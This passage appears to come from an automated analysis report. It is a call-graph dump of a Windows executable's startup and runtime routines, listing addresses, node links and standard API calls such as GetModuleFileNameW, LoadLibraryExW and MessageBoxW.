7ff6e5ab38e7 15131->15123 15132 7ff6e5ab38eb 15131->15132 15138 7ff6e5ab3a07 15133->15138 15136 7ff6e5ab39a1 15139 7ff6e5ab5890 FreeLibrary 15136->15139 15138->15147 15421 7ff6e5ab6fd0 15138->15421 15139->15147 15147->15075 15149 7ff6e5ac899b 15148->15149 15150 7ff6e5ac89bc 15148->15150 15149->15035 17967 7ff6e5ac90d8 15150->17967 15154 7ff6e5abb83d 15153->15154 15154->15043 15157 7ff6e5abb511 15155->15157 15156 7ff6e5abb2c0 15156->15032 15157->15156 15158 7ff6e5abcac8 __scrt_initialize_crt 7 API calls 15157->15158 15158->15156 15160 7ff6e5abb6c2 _wfindfirst32i64 __scrt_get_show_window_mode 15159->15160 15161 7ff6e5abb6e1 RtlCaptureContext RtlLookupFunctionEntry 15160->15161 15162 7ff6e5abb746 __scrt_get_show_window_mode 15161->15162 15163 7ff6e5abb70a RtlVirtualUnwind 15161->15163 15164 7ff6e5abb778 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 15162->15164 15163->15162 15165 7ff6e5abb7ca _wfindfirst32i64 15164->15165 15165->15027 15167 7ff6e5abb38e __scrt_dllmain_crt_thread_attach 15166->15167 15167->15049 15167->15050 15169 7ff6e5ad25cc 15168->15169 15170 7ff6e5abb3a0 15169->15170 15178 7ff6e5acb9f0 15169->15178 15170->15049 15172 7ff6e5abcac8 15170->15172 15173 7ff6e5abcad0 15172->15173 15174 7ff6e5abcada 15172->15174 15190 7ff6e5abce44 15173->15190 15174->15049 15189 7ff6e5acf788 EnterCriticalSection 15178->15189 15191 7ff6e5abcad5 15190->15191 15192 7ff6e5abce53 15190->15192 15194 7ff6e5abceb0 15191->15194 15198 7ff6e5abd080 15192->15198 15195 7ff6e5abcedb 15194->15195 15196 7ff6e5abcedf 15195->15196 15197 7ff6e5abcebe DeleteCriticalSection 15195->15197 15196->15174 15197->15195 15202 7ff6e5abcee8 15198->15202 15203 7ff6e5abd002 TlsFree 15202->15203 15208 7ff6e5abcf2c __vcrt_InitializeCriticalSectionEx 15202->15208 15204 7ff6e5abcf5a LoadLibraryExW 15206 7ff6e5abcfd1 15204->15206 15207 7ff6e5abcf7b GetLastError 15204->15207 15205 7ff6e5abcff1 GetProcAddress 15205->15203 15206->15205 15209 7ff6e5abcfe8 FreeLibrary 15206->15209 15207->15208 15208->15203 15208->15204 15208->15205 15210 7ff6e5abcf9d LoadLibraryExW 15208->15210 15209->15205 15210->15206 15210->15208 15212 7ff6e5abb0c0 15211->15212 15228 7ff6e5ac579c 15212->15228 15214 7ff6e5abb0cc 15234 7ff6e5abb3b8 15214->15234 15216 7ff6e5abb69c 7 API calls 15218 7ff6e5abb165 15216->15218 15217 7ff6e5abb0e4 _RTC_Initialize 15226 7ff6e5abb139 15217->15226 15239 7ff6e5abb568 15217->15239 15218->15056 15220 7ff6e5abb0f9 15242 7ff6e5ac7e6c 15220->15242 15226->15216 15227 7ff6e5abb155 15226->15227 15227->15056 15229 7ff6e5ac57ad 15228->15229 15230 7ff6e5ac57b5 15229->15230 15231 7ff6e5ac4444 _findclose 11 API calls 15229->15231 15230->15214 15232 7ff6e5ac57c4 15231->15232 15233 7ff6e5ac9db0 _invalid_parameter_noinfo 37 API calls 15232->15233 15233->15230 15235 7ff6e5abb3c9 15234->15235 15238 7ff6e5abb3ce __scrt_release_startup_lock 15234->15238 15236 7ff6e5abb69c 7 API calls 15235->15236 15235->15238 15237 7ff6e5abb442 15236->15237 15238->15217 15268 7ff6e5abb52c 15239->15268 15241 7ff6e5abb571 15241->15220 15243 7ff6e5ac7e8c 15242->15243 15250 7ff6e5abb105 15242->15250 15244 7ff6e5ac7e94 15243->15244 15245 7ff6e5ac7eaa GetModuleFileNameW 15243->15245 15246 7ff6e5ac4444 _findclose 11 API calls 15244->15246 15249 7ff6e5ac7ed5 15245->15249 15247 7ff6e5ac7e99 15246->15247 15248 7ff6e5ac9db0 _invalid_parameter_noinfo 37 API calls 15247->15248 15248->15250 15283 7ff6e5ac7e0c 15249->15283 15250->15226 15267 7ff6e5abb63c InitializeSListHead 15250->15267 15253 7ff6e5ac7f1d 15254 7ff6e5ac4444 _findclose 11 API calls 15253->15254 15255 7ff6e5ac7f22 15254->15255 15256 7ff6e5ac9e18 __free_lconv_mon 11 API calls 15255->15256 15259 7ff6e5ac7f30 15256->15259 15257 7ff6e5ac7f57 15260 7ff6e5ac9e18 __free_lconv_mon 11 API calls 15257->15260 15258 7ff6e5ac7f35 15258->15257 15261 7ff6e5ac7f83 15258->15261 15262 7ff6e5ac7f9c 15258->15262 15259->15250 15260->15250 15263 7ff6e5ac9e18 __free_lconv_mon 11 API calls 15261->15263 15265 7ff6e5ac9e18 __free_lconv_mon 11 API calls 15262->15265 15264 7ff6e5ac7f8c 15263->15264 15266 7ff6e5ac9e18 __free_lconv_mon 11 API calls 15264->15266 15265->15257 15266->15259 15269 7ff6e5abb546 15268->15269 15271 7ff6e5abb53f 15268->15271 15272 7ff6e5ac8eec 15269->15272 15271->15241 15275 7ff6e5ac8b28 15272->15275 15282 7ff6e5acf788 EnterCriticalSection 15275->15282 15284 7ff6e5ac7e5c 15283->15284 15285 7ff6e5ac7e24 15283->15285 15284->15253 15284->15258 15285->15284 15286 7ff6e5acdd40 _findclose 11 API calls 15285->15286 15287 7ff6e5ac7e52 15286->15287 15288 7ff6e5ac9e18 __free_lconv_mon 11 API calls 15287->15288 15288->15284 15306 7ff6e5abb880 SetUnhandledExceptionFilter 15289->15306 15298 7ff6e5ac429b 15297->15298 15307 7ff6e5ace354 15298->15307 15320 7ff6e5acf788 EnterCriticalSection 15307->15320 15322 7ff6e5abb7ff GetStartupInfoW 15321->15322 15322->15038 15325 7ff6e5ab761f 15323->15325 15324 7ff6e5ab7670 WideCharToMultiByte 15324->15325 15326 7ff6e5ab7718 15324->15326 15325->15324 15325->15326 15327 7ff6e5ab76c6 WideCharToMultiByte 15325->15327 15329 7ff6e5ab7627 __std_exception_copy 15325->15329 15653 7ff6e5ab2620 15326->15653 15327->15325 15327->15326 15329->15069 15333 7ff6e5acec40 15330->15333 15331 7ff6e5acec93 15332 7ff6e5ac9ce4 _invalid_parameter_noinfo 37 API calls 15331->15332 15336 7ff6e5acecbc 15332->15336 15333->15331 15334 7ff6e5acece6 15333->15334 16043 7ff6e5aceb18 15334->16043 15336->15071 15338 7ff6e5ab1b05 15337->15338 15339 7ff6e5ab1b20 15338->15339 16051 7ff6e5ab24d0 15338->16051 15339->15147 15341 7ff6e5ab3ba0 15339->15341 15342 7ff6e5abadb0 15341->15342 15343 7ff6e5ab3bac GetModuleFileNameW 15342->15343 15344 7ff6e5ab3bf2 15343->15344 15345 7ff6e5ab3bdb 15343->15345 16091 7ff6e5ab7b40 15344->16091 15346 7ff6e5ab2620 57 API calls 15345->15346 15348 7ff6e5ab3bee 15346->15348 15350 7ff6e5abad80 _wfindfirst32i64 8 API calls 15348->15350 15352 7ff6e5ab3c2f 15350->15352 15351 7ff6e5ab2770 59 API calls 15351->15348 15352->15077 15354 7ff6e5ab1b30 49 API calls 15353->15354 15355 7ff6e5ab3b3d 15354->15355 15355->15079 15357 7ff6e5ab699a 15356->15357 15358 7ff6e5ab7a30 57 API calls 15357->15358 15359 7ff6e5ab69bc GetEnvironmentVariableW 15358->15359 15360 7ff6e5ab69d4 ExpandEnvironmentStringsW 15359->15360 15361 7ff6e5ab6a26 15359->15361 15363 7ff6e5ab7b40 59 API calls 15360->15363 15362 7ff6e5abad80 _wfindfirst32i64 8 API calls 15361->15362 15364 7ff6e5ab6a38 15362->15364 15365 7ff6e5ab69fc 15363->15365 15364->15081 15365->15361 15366 7ff6e5ab6a06 15365->15366 16102 7ff6e5ac910c 15366->16102 15369 7ff6e5abad80 _wfindfirst32i64 8 API calls 15370 7ff6e5ab6a1e 15369->15370 15370->15081 15372 7ff6e5ab7a30 57 API calls 15371->15372 15373 7ff6e5ab6fa7 SetEnvironmentVariableW 15372->15373 15374 7ff6e5ab6fbf __std_exception_copy 15373->15374 15374->15085 15376 7ff6e5ab1b30 49 API calls 15375->15376 15377 7ff6e5ab1a00 15376->15377 15378 7ff6e5ab1b30 49 API calls 15377->15378 15383 7ff6e5ab1a7a 15377->15383 15379 7ff6e5ab1a22 15378->15379 15380 7ff6e5ab3b20 49 API calls 15379->15380 15379->15383 15381 7ff6e5ab1a3b 15380->15381 16109 7ff6e5ab17b0 15381->16109 15383->15088 15383->15090 15385 7ff6e5abf2ac 74 API calls 15385->15383 15387 7ff6e5ab7a51 MultiByteToWideChar 15386->15387 15388 7ff6e5ab7ad7 MultiByteToWideChar 15386->15388 15389 7ff6e5ab7a77 15387->15389 15390 7ff6e5ab7a9c 15387->15390 15391 7ff6e5ab7b1f 15388->15391 15392 7ff6e5ab7afa 15388->15392 15394 7ff6e5ab2620 55 API calls 15389->15394 15390->15388 15397 7ff6e5ab7ab2 15390->15397 15391->15098 15393 7ff6e5ab2620 55 API calls 15392->15393 15395 7ff6e5ab7b0d 15393->15395 15396 7ff6e5ab7a8a 15394->15396 15395->15098 15396->15098 15398 7ff6e5ab2620 55 API calls 15397->15398 15399 7ff6e5ab7ac5 15398->15399 15399->15098 15401 7ff6e5ab5e55 15400->15401 15402 7ff6e5ab38b0 15401->15402 15403 7ff6e5ab24d0 59 API calls 15401->15403 15402->15108 15508 7ff6e5ab5ae0 15402->15508 15403->15402 15405 7ff6e5ab31c4 15404->15405 15413 7ff6e5ab3183 15404->15413 15406 7ff6e5ab3203 15405->15406 15407 7ff6e5ab1ab0 74 API calls 15405->15407 15408 7ff6e5abad80 _wfindfirst32i64 8 API calls 15406->15408 15407->15405 15409 7ff6e5ab3215 15408->15409 15409->15147 15414 7ff6e5ab6f20 15409->15414 15413->15405 16182 7ff6e5ab1440 15413->16182 16216 7ff6e5ab2990 15413->16216 16271 7ff6e5ab1780 15413->16271 15415 7ff6e5ab7a30 57 API calls 15414->15415 15416 7ff6e5ab6f3f 15415->15416 15417 7ff6e5ab7a30 57 API calls 15416->15417 15418 7ff6e5ab6f4f 15417->15418 15419 7ff6e5ac66b4 38 API calls 15418->15419 15420 7ff6e5ab6f5d __std_exception_copy 15419->15420 15420->15129 15422 7ff6e5ab6fe0 15421->15422 15423 7ff6e5ab7a30 57 API calls 15422->15423 15424 7ff6e5ab7011 SetConsoleCtrlHandler GetStartupInfoW 15423->15424 15425 7ff6e5ab7072 15424->15425 17139 7ff6e5ac9184 15425->17139 15469 7ff6e5ab2790 15468->15469 15470 7ff6e5ac3be4 49 API calls 15469->15470 15471 7ff6e5ab27dd __scrt_get_show_window_mode 15470->15471 15472 7ff6e5ab7a30 57 API calls 15471->15472 15473 7ff6e5ab280a 15472->15473 15474 7ff6e5ab280f 15473->15474 15475 7ff6e5ab2849 MessageBoxA 15473->15475 15476 7ff6e5ab7a30 57 API calls 15474->15476 15477 7ff6e5ab2863 15475->15477 15478 7ff6e5ab2829 MessageBoxW 15476->15478 15479 7ff6e5abad80 _wfindfirst32i64 8 API calls 15477->15479 15478->15477 15480 7ff6e5ab2873 15479->15480 15480->15147 15482 7ff6e5ab3cbc 15481->15482 15483 7ff6e5ab7a30 57 API calls 15482->15483 15484 7ff6e5ab3ce7 15483->15484 15485 7ff6e5ab7a30 57 API calls 15484->15485 15486 7ff6e5ab3cfa 15485->15486 17195 7ff6e5ac54c8 15486->17195 15489 7ff6e5abad80 _wfindfirst32i64 8 API calls 15490 7ff6e5ab37da 15489->15490 15490->15109 15491 7ff6e5ab7200 15490->15491 15492 7ff6e5ab7224 15491->15492 15493 7ff6e5abf934 73 API calls 15492->15493 15498 7ff6e5ab72fb __std_exception_copy 15492->15498 15494 7ff6e5ab723e 15493->15494 15494->15498 17574 7ff6e5ac7938 15494->17574 15496 7ff6e5abf934 73 API calls 15499 7ff6e5ab7253 15496->15499 15497 7ff6e5abf5fc _fread_nolock 53 API calls 15497->15499 15498->15112 15499->15496 15499->15497 15499->15498 15501 7ff6e5abf2dc 15500->15501 17589 7ff6e5abf088 15501->17589 15503 7ff6e5abf2f5 15503->15109 15505 7ff6e5ab3297 15504->15505 15506 7ff6e5ab32c0 15504->15506 15505->15506 15507 7ff6e5ab1780 59 API calls 15505->15507 15506->15091 15507->15505 15509 7ff6e5ab5b04 15508->15509 15514 7ff6e5ab5b31 15508->15514 15510 7ff6e5ab5b27 __std_exception_copy memcpy_s 15509->15510 15511 7ff6e5ab5b2c 15509->15511 15512 7ff6e5ab1780 59 API calls 15509->15512 15509->15514 15510->15114 17600 7ff6e5ab12b0 15511->17600 15512->15509 15514->15510 17626 7ff6e5ab3d30 15514->17626 15516 7ff6e5ab5b97 15516->15510 15517 7ff6e5ab2770 59 API calls 15516->15517 15517->15510 15532 7ff6e5ab565a memcpy_s 15518->15532 15520 7ff6e5ab577f 15522 7ff6e5ab3d30 49 API calls 15520->15522 15521 7ff6e5ab579b 15524 7ff6e5ab2770 59 API calls 15521->15524 15523 7ff6e5ab57f8 15522->15523 15527 7ff6e5ab3d30 49 API calls 15523->15527 15530 7ff6e5ab5791 __std_exception_copy 15524->15530 15525 7ff6e5ab3d30 49 API calls 15525->15532 15526 7ff6e5ab5760 15526->15520 15528 7ff6e5ab3d30 49 API calls 15526->15528 15529 7ff6e5ab5828 15527->15529 15528->15520 15534 7ff6e5ab3d30 49 API calls 15529->15534 15531 7ff6e5abad80 _wfindfirst32i64 8 API calls 15530->15531 15533 7ff6e5ab38d9 15531->15533 15532->15520 15532->15521 15532->15525 15532->15526 15532->15532 15535 7ff6e5ab1440 161 API calls 15532->15535 15536 7ff6e5ab5781 15532->15536 17629 7ff6e5ab1650 15532->17629 15533->15123 15533->15124 15534->15530 15535->15532 15537 7ff6e5ab2770 59 API calls 15536->15537 15537->15530 17634 7ff6e5ab71b0 15538->17634 15540 7ff6e5ab55e2 15541 7ff6e5ab71b0 58 API calls 15540->15541 15542 7ff6e5ab55f5 15541->15542 15543 7ff6e5ab561a 15542->15543 15544 7ff6e5ab560d GetProcAddress 15542->15544 15545 7ff6e5ab2770 59 API calls 15543->15545 15548 7ff6e5ab5f79 15544->15548 15549 7ff6e5ab5f9c GetProcAddress 15544->15549 15547 7ff6e5ab5626 15545->15547 15547->15131 15552 7ff6e5ab2620 57 API calls 15548->15552 15549->15548 15550 7ff6e5ab5fc1 GetProcAddress 15549->15550 15550->15548 15551 7ff6e5ab5fe6 GetProcAddress 15550->15551 15551->15548 15553 7ff6e5ab600e GetProcAddress 15551->15553 15554 7ff6e5ab5f8c 15552->15554 15553->15548 15554->15131 15613 7ff6e5ab1b55 15612->15613 15614 7ff6e5ac3be4 49 API calls 15613->15614 15615 7ff6e5ab1b78 15614->15615 15615->15130 17638 7ff6e5ab4960 15616->17638 15619 7ff6e5ab30fd 15619->15136 15621 7ff6e5ab30d4 15621->15619 17694 7ff6e5ab46e0 15621->17694 15672 7ff6e5abadb0 15653->15672 15656 7ff6e5ab2669 15674 7ff6e5ac3be4 15656->15674 15661 7ff6e5ab1b30 49 API calls 15662 7ff6e5ab26c8 __scrt_get_show_window_mode 15661->15662 15663 7ff6e5ab7a30 54 API calls 15662->15663 15664 7ff6e5ab26f5 15663->15664 15665 7ff6e5ab2734 MessageBoxA 15664->15665 15666 7ff6e5ab26fa 15664->15666 15668 7ff6e5ab274e 15665->15668 15667 7ff6e5ab7a30 54 API calls 15666->15667 15669 7ff6e5ab2714 MessageBoxW 15667->15669 15670 7ff6e5abad80 _wfindfirst32i64 8 API calls 15668->15670 15669->15668 15671 7ff6e5ab275e 15670->15671 15671->15329 15673 7ff6e5ab263c GetLastError 15672->15673 15673->15656 15675 7ff6e5ac3c3e 15674->15675 15676 7ff6e5ac3c63 15675->15676 15678 7ff6e5ac3c9f 15675->15678 15677 7ff6e5ac9ce4 _invalid_parameter_noinfo 37 API calls 15676->15677 15680 7ff6e5ac3c8d 15677->15680 15704 7ff6e5ac1e70 15678->15704 15682 7ff6e5abad80 _wfindfirst32i64 8 API calls 15680->15682 15681 7ff6e5ac3d7c 15683 7ff6e5ac9e18 __free_lconv_mon 11 API calls 15681->15683 15684 7ff6e5ab2699 15682->15684 15683->15680 15692 7ff6e5ab74b0 15684->15692 15686 7ff6e5ac3d51 15688 7ff6e5ac9e18 __free_lconv_mon 11 API calls 15686->15688 15687 7ff6e5ac3da0 15687->15681 15690 7ff6e5ac3daa 15687->15690 15688->15680 15689 7ff6e5ac3d48 15689->15681 15689->15686 15691 7ff6e5ac9e18 __free_lconv_mon 11 API calls 15690->15691 15691->15680 15693 7ff6e5ab74bc 15692->15693 15694 7ff6e5ab74d7 GetLastError 15693->15694 15695 7ff6e5ab74dd FormatMessageW 15693->15695 15694->15695 15696 7ff6e5ab7510 15695->15696 15697 7ff6e5ab752c WideCharToMultiByte 15695->15697 15698 7ff6e5ab2620 54 API calls 15696->15698 15699 7ff6e5ab7523 15697->15699 15700 7ff6e5ab7566 15697->15700 15698->15699 15702 7ff6e5abad80 _wfindfirst32i64 8 API calls 15699->15702 15701 7ff6e5ab2620 54 API calls 15700->15701 15701->15699 15703 7ff6e5ab26a0 15702->15703 15703->15661 15705 7ff6e5ac1eae 15704->15705 15706 7ff6e5ac1e9e 15704->15706 15707 7ff6e5ac1eb7 15705->15707 15714 7ff6e5ac1ee5 15705->15714 15710 7ff6e5ac9ce4 _invalid_parameter_noinfo 37 API calls 15706->15710 15708 7ff6e5ac9ce4 _invalid_parameter_noinfo 37 API calls 15707->15708 15709 7ff6e5ac1edd 15708->15709 15709->15681 15709->15686 15709->15687 15709->15689 15710->15709 15713 7ff6e5ac2194 15716 7ff6e5ac9ce4 _invalid_parameter_noinfo 37 API calls 15713->15716 15714->15706 15714->15709 15714->15713 15718 7ff6e5ac2800 15714->15718 15744 7ff6e5ac24c8 15714->15744 15774 7ff6e5ac1d50 15714->15774 15777 7ff6e5ac3a20 15714->15777 15716->15706 15719 7ff6e5ac28b5 15718->15719 15720 7ff6e5ac2842 15718->15720 15723 7ff6e5ac290f 15719->15723 15724 7ff6e5ac28ba 15719->15724 15721 7ff6e5ac28df 15720->15721 15722 7ff6e5ac2848 15720->15722 15801 7ff6e5ac0db0 15721->15801 15729 7ff6e5ac284d 15722->15729 15732 7ff6e5ac291e 15722->15732 15723->15721 15723->15732 15742 7ff6e5ac2878 15723->15742 15725 7ff6e5ac28ef 15724->15725 15726 7ff6e5ac28bc 15724->15726 15808 7ff6e5ac09a0 15725->15808 15728 7ff6e5ac285d 15726->15728 15735 7ff6e5ac28cb 15726->15735 15743 7ff6e5ac294d 15728->15743 15783 7ff6e5ac3164 15728->15783 15729->15728 15733 7ff6e5ac2890 15729->15733 15729->15742 15732->15743 15815 7ff6e5ac11c0 15732->15815 15733->15743 15793 7ff6e5ac3620 15733->15793 15735->15721 15736 7ff6e5ac28d0 15735->15736 15736->15743 15797 7ff6e5ac37b8 15736->15797 15738 7ff6e5abad80 _wfindfirst32i64 8 API calls 15740 7ff6e5ac2be3 15738->15740 15740->15714 15742->15743 15822 7ff6e5acda00 15742->15822 15743->15738 15745 7ff6e5ac24d3 15744->15745 15746 7ff6e5ac24e9 15744->15746 15747 7ff6e5ac2527 15745->15747 15748 7ff6e5ac28b5 15745->15748 15749 7ff6e5ac2842 15745->15749 15746->15747 15750 7ff6e5ac9ce4 _invalid_parameter_noinfo 37 API calls 15746->15750 15747->15714 15753 7ff6e5ac290f 15748->15753 15754 7ff6e5ac28ba 15748->15754 15751 7ff6e5ac28df 15749->15751 15752 7ff6e5ac2848 15749->15752 15750->15747 15757 7ff6e5ac0db0 38 API calls 15751->15757 15758 7ff6e5ac284d 15752->15758 15761 7ff6e5ac291e 15752->15761 15753->15751 15753->15761 15772 7ff6e5ac2878 15753->15772 15755 7ff6e5ac28ef 15754->15755 15756 7ff6e5ac28bc 15754->15756 15759 7ff6e5ac09a0 38 API calls 15755->15759 15764 7ff6e5ac28cb 15756->15764 15767 7ff6e5ac285d 15756->15767 15757->15772 15762 7ff6e5ac2890 15758->15762 15758->15767 15758->15772 15759->15772 15760 7ff6e5ac3164 47 API calls 15760->15772 15763 7ff6e5ac11c0 38 API calls 15761->15763 15773 7ff6e5ac294d 15761->15773 15765 7ff6e5ac3620 47 API calls 15762->15765 15762->15773 15763->15772 15764->15751 15766 7ff6e5ac28d0 15764->15766 15765->15772 15769 7ff6e5ac37b8 37 API calls 15766->15769 15766->15773 15767->15760 15767->15773 15768 7ff6e5abad80 _wfindfirst32i64 8 API calls 15770 7ff6e5ac2be3 15768->15770 15769->15772 15770->15714 15771 7ff6e5acda00 47 API calls 15771->15772 15772->15771 15772->15773 15773->15768 15971 7ff6e5abff74 15774->15971 15778 7ff6e5ac3a37 15777->15778 15988 7ff6e5accb60 15778->15988 15784 7ff6e5ac3186 15783->15784 15832 7ff6e5abfde0 15784->15832 15789 7ff6e5ac3a20 45 API calls 15791 7ff6e5ac32c3 15789->15791 15790 7ff6e5ac334c 15790->15742 15791->15790 15792 7ff6e5ac3a20 45 API calls 15791->15792 15792->15790 15794 7ff6e5ac36a0 15793->15794 15795 7ff6e5ac3638 15793->15795 15794->15742 15795->15794 15796 7ff6e5acda00 47 API calls 15795->15796 15796->15794 15799 7ff6e5ac37d9 15797->15799 15798 7ff6e5ac9ce4 _invalid_parameter_noinfo 37 API calls 15800 7ff6e5ac380a 15798->15800 15799->15798 15799->15800 15800->15742 15802 7ff6e5ac0de3 15801->15802 15803 7ff6e5ac0e12 15802->15803 15805 7ff6e5ac0ecf 15802->15805 15804 7ff6e5abfde0 12 API calls 15803->15804 15807 7ff6e5ac0e4f 15803->15807 15804->15807 15806 7ff6e5ac9ce4 _invalid_parameter_noinfo 37 API calls 15805->15806 15806->15807 15807->15742 15809 7ff6e5ac09d3 15808->15809 15810 7ff6e5ac0a02 15809->15810 15812 7ff6e5ac0abf 15809->15812 15811 7ff6e5abfde0 12 API calls 15810->15811 15814 7ff6e5ac0a3f 15810->15814 15811->15814 15813 7ff6e5ac9ce4 _invalid_parameter_noinfo 37 API calls 15812->15813 15813->15814 15814->15742 15816 7ff6e5ac11f3 15815->15816 15817 7ff6e5ac1222 15816->15817 15819 7ff6e5ac12df 15816->15819 15818 7ff6e5abfde0 12 API calls 15817->15818 15821 7ff6e5ac125f 15817->15821 15818->15821 15820 7ff6e5ac9ce4 _invalid_parameter_noinfo 37 API calls 15819->15820 15820->15821 15821->15742 15824 7ff6e5acda28 15822->15824 15823 7ff6e5acda6d 15827 7ff6e5acda2d __scrt_get_show_window_mode 15823->15827 15831 7ff6e5acda56 __scrt_get_show_window_mode 15823->15831 15968 7ff6e5acf0b8 15823->15968 15824->15823 15825 7ff6e5ac3a20 45 API calls 15824->15825 15824->15827 15824->15831 15825->15823 15826 7ff6e5ac9ce4 _invalid_parameter_noinfo 37 API calls 15826->15827 15827->15742 15831->15826 15831->15827 15833 7ff6e5abfe17 15832->15833 15839 7ff6e5abfe06 15832->15839 15834 7ff6e5accacc _fread_nolock 12 API calls 15833->15834 15833->15839 15836 7ff6e5abfe44 15834->15836 15835 7ff6e5abfe58 15837 7ff6e5ac9e18 __free_lconv_mon 11 API calls 15835->15837 15836->15835 15838 7ff6e5ac9e18 __free_lconv_mon 11 API calls 15836->15838 15837->15839 15838->15835 15840 7ff6e5acd718 15839->15840 15841 7ff6e5acd735 15840->15841 15842 7ff6e5acd768 15840->15842 15843 7ff6e5ac9ce4 _invalid_parameter_noinfo 37 API calls 15841->15843 15842->15841 15844 7ff6e5acd79a 15842->15844 15853 7ff6e5ac32a1 15843->15853 15851 7ff6e5acd8ad 15844->15851 15857 7ff6e5acd7e2 15844->15857 15845 7ff6e5acd99f 15895 7ff6e5accc04 15845->15895 15847 7ff6e5acd965 15888 7ff6e5accf9c 15847->15888 15849 7ff6e5acd934 15881 7ff6e5acd27c 15849->15881 15851->15845 15851->15847 15851->15849 15852 7ff6e5acd8f7 15851->15852 15854 7ff6e5acd8ed 15851->15854 15871 7ff6e5acd4ac 15852->15871 15853->15789 15853->15791 15854->15847 15856 7ff6e5acd8f2 15854->15856 15856->15849 15856->15852 15857->15853 15862 7ff6e5ac91ac 15857->15862 15860 7ff6e5ac9dd0 _wfindfirst32i64 17 API calls 15861 7ff6e5acd9fc 15860->15861 15863 7ff6e5ac91c3 15862->15863 15864 7ff6e5ac91b9 15862->15864 15865 7ff6e5ac4444 _findclose 11 API calls 15863->15865 15864->15863 15866 7ff6e5ac91de 15864->15866 15870 7ff6e5ac91ca 15865->15870 15868 7ff6e5ac91d6 15866->15868 15869 7ff6e5ac4444 _findclose 11 API calls 15866->15869 15867 7ff6e5ac9db0 _invalid_parameter_noinfo 37 API calls 15867->15868 15868->15853 15868->15860 15869->15870 15870->15867 15904 7ff6e5ad31cc 15871->15904 15875 7ff6e5acd554 15876 7ff6e5acd5a9 15875->15876 15877 7ff6e5acd574 15875->15877 15880 7ff6e5acd558 15875->15880 15957 7ff6e5acd098 15876->15957 15953 7ff6e5acd354 15877->15953 15880->15853 15882 7ff6e5ad31cc 38 API calls 15881->15882 15883 7ff6e5acd2c6 15882->15883 15884 7ff6e5ad2c14 37 API calls 15883->15884 15885 7ff6e5acd316 15884->15885 15886 7ff6e5acd31a 15885->15886 15887 7ff6e5acd354 45 API calls 15885->15887 15886->15853 15887->15886 15889 7ff6e5ad31cc 38 API calls 15888->15889 15890 7ff6e5accfe7 15889->15890 15891 7ff6e5ad2c14 37 API calls 15890->15891 15892 7ff6e5acd03f 15891->15892 15893 7ff6e5acd043 15892->15893 15894 7ff6e5acd098 45 API calls 15892->15894 15893->15853 15894->15893 15896 7ff6e5accc7c 15895->15896 15897 7ff6e5accc49 15895->15897 15898 7ff6e5accc94 15896->15898 15902 7ff6e5accd15 15896->15902 15899 7ff6e5ac9ce4 _invalid_parameter_noinfo 37 API calls 15897->15899 15900 7ff6e5accf9c 46 API calls 15898->15900 15901 7ff6e5accc75 __scrt_get_show_window_mode 15899->15901 15900->15901 15901->15853 15902->15901 15903 7ff6e5ac3a20 45 API calls 15902->15903 15903->15901 15905 7ff6e5ad321f fegetenv 15904->15905 15906 7ff6e5ad712c 37 API calls 15905->15906 15916 7ff6e5ad3272 15906->15916 15907 7ff6e5ad329f 15911 7ff6e5ac91ac __std_exception_copy 37 API calls 15907->15911 15908 7ff6e5ad3362 15909 7ff6e5ad712c 37 API calls 15908->15909 15910 7ff6e5ad338c 15909->15910 15914 7ff6e5ad712c 37 API calls 15910->15914 15915 7ff6e5ad331d 15911->15915 15912 7ff6e5ad333c 15919 7ff6e5ac91ac __std_exception_copy 37 API calls 15912->15919 15913 7ff6e5ad328d 15913->15907 15913->15908 15917 7ff6e5ad339d 15914->15917 15918 7ff6e5ad4444 15915->15918 15923 7ff6e5ad3325 15915->15923 15916->15908 15916->15912 15916->15913 15920 7ff6e5ad7320 20 API calls 15917->15920 15921 7ff6e5ac9dd0 _wfindfirst32i64 17 API calls 15918->15921 15919->15915 15931 7ff6e5ad3406 __scrt_get_show_window_mode 15920->15931 15922 7ff6e5ad4459 15921->15922 15924 7ff6e5abad80 _wfindfirst32i64 8 API calls 15923->15924 15925 7ff6e5acd4f9 15924->15925 15949 7ff6e5ad2c14 15925->15949 15926 7ff6e5ad37af __scrt_get_show_window_mode 15927 7ff6e5ad3aef 15928 7ff6e5ad2d30 37 API calls 15927->15928 15935 7ff6e5ad4207 15928->15935 15929 7ff6e5ad3a9b 15929->15927 15932 7ff6e5ad445c memcpy_s 37 API calls 15929->15932 15930 7ff6e5ad3447 memcpy_s 15944 7ff6e5ad38a3 memcpy_s __scrt_get_show_window_mode 15930->15944 15945 7ff6e5ad3d8b memcpy_s __scrt_get_show_window_mode 15930->15945 15931->15926 15931->15930 15933 7ff6e5ac4444 _findclose 11 API calls 15931->15933 15932->15927 15934 7ff6e5ad3880 15933->15934 15936 7ff6e5ac9db0 _invalid_parameter_noinfo 37 API calls 15934->15936 15937 7ff6e5ad445c memcpy_s 37 API calls 15935->15937 15941 7ff6e5ad4262 15935->15941 15936->15930 15937->15941 15938 7ff6e5ad43e8 15940 7ff6e5ad712c 37 API calls 15938->15940 15939 7ff6e5ac4444 11 API calls _findclose 15939->15944 15940->15923 15941->15938 15943 7ff6e5ad2d30 37 API calls 15941->15943 15947 7ff6e5ad445c memcpy_s 37 API calls 15941->15947 15942 7ff6e5ac4444 11 API calls _findclose 15942->15945 15943->15941 15944->15929 15944->15939 15946 7ff6e5ac9db0 37 API calls _invalid_parameter_noinfo 15944->15946 15945->15927 15945->15929 15945->15942 15948 7ff6e5ac9db0 37 API calls _invalid_parameter_noinfo 15945->15948 15946->15944 15947->15941 15948->15945 15950 7ff6e5ad2c33 15949->15950 15951 7ff6e5ac9ce4 _invalid_parameter_noinfo 37 API calls 15950->15951 15952 7ff6e5ad2c5e memcpy_s 15950->15952 15951->15952 15952->15875 15954 7ff6e5acd380 memcpy_s 15953->15954 15955 7ff6e5ac3a20 45 API calls 15954->15955 15956 7ff6e5acd43a memcpy_s __scrt_get_show_window_mode 15954->15956 15955->15956 15956->15880 15958 7ff6e5acd0d3 15957->15958 15961 7ff6e5acd120 memcpy_s 15957->15961 15959 7ff6e5ac9ce4 _invalid_parameter_noinfo 37 API calls 15958->15959 15960 7ff6e5acd0ff 15959->15960 15960->15880 15962 7ff6e5acd18b 15961->15962 15964 7ff6e5ac3a20 45 API calls 15961->15964 15963 7ff6e5ac91ac __std_exception_copy 37 API calls 15962->15963 15967 7ff6e5acd1cd memcpy_s 15963->15967 15964->15962 15965 7ff6e5ac9dd0 _wfindfirst32i64 17 API calls 15966 7ff6e5acd278 15965->15966 15967->15965 15969 7ff6e5acf0dc WideCharToMultiByte 15968->15969 15972 7ff6e5abffa1 15971->15972 15973 